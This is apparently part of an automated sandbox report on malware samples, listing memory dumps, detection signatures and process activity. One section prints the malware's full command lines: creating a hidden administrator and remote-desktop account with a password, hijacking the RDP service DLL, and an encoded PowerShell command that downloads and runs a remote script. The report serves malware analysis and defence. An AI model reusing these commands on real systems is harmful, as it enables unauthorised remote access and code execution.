| SHA512 | e3d547299c84c9952714d1b677a7d5fc57c7343a8c966b2a4346629c42435408f59bdbf54f328eea05c1e605711d82eb0221a2b4b19ff87b828cbdc9e741ba1a |
memory/2092-126-0x0000000000400000-0x000000000042E000-memory.dmp
memory/2092-127-0x000000000041EBD0-mapping.dmp
memory/2092-129-0x0000000001C10000-0x0000000001C24000-memory.dmp
memory/2092-128-0x00000000018A0000-0x0000000001BC0000-memory.dmp
memory/3064-130-0x0000000004DB0000-0x0000000004F53000-memory.dmp
memory/3064-132-0x00000000043C0000-0x00000000044C7000-memory.dmp
memory/2092-131-0x0000000001C60000-0x0000000001C74000-memory.dmp
memory/1040-133-0x0000000000000000-mapping.dmp
memory/1040-134-0x0000000001250000-0x0000000001270000-memory.dmp
memory/1040-135-0x00000000007C0000-0x00000000007EE000-memory.dmp
memory/3824-136-0x0000000000000000-mapping.dmp
memory/1040-137-0x0000000000E70000-0x0000000001190000-memory.dmp
memory/1040-138-0x0000000000CD0000-0x0000000000D63000-memory.dmp
memory/3064-139-0x00000000025C0000-0x0000000002687000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
56s
Max time network
118s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2896 set thread context of 3024 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
Files
memory/2896-114-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/2896-116-0x0000000005940000-0x0000000005941000-memory.dmp
memory/2896-117-0x00000000054E0000-0x00000000054E1000-memory.dmp
memory/2896-118-0x0000000005470000-0x0000000005471000-memory.dmp
memory/2896-119-0x00000000056F0000-0x00000000056F1000-memory.dmp
memory/2896-120-0x0000000005440000-0x000000000593E000-memory.dmp
memory/2896-121-0x0000000006F40000-0x0000000006F5B000-memory.dmp
memory/2896-122-0x0000000008B60000-0x0000000008BD3000-memory.dmp
memory/2896-123-0x0000000008BF0000-0x0000000008C1E000-memory.dmp
memory/3024-124-0x0000000000400000-0x0000000000428000-memory.dmp
memory/3024-125-0x000000000041D020-mapping.dmp
memory/3024-126-0x0000000001650000-0x0000000001970000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
53s
Max time network
116s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8199.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI81E8.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8218.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_olaj0bm5.1xs.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bj2piuzv.0l4.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8229.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI823A.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES403B.tmp" "c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc zr0Htc6U /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc zr0Htc6U /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc zr0Htc6U
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc zr0Htc6U
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
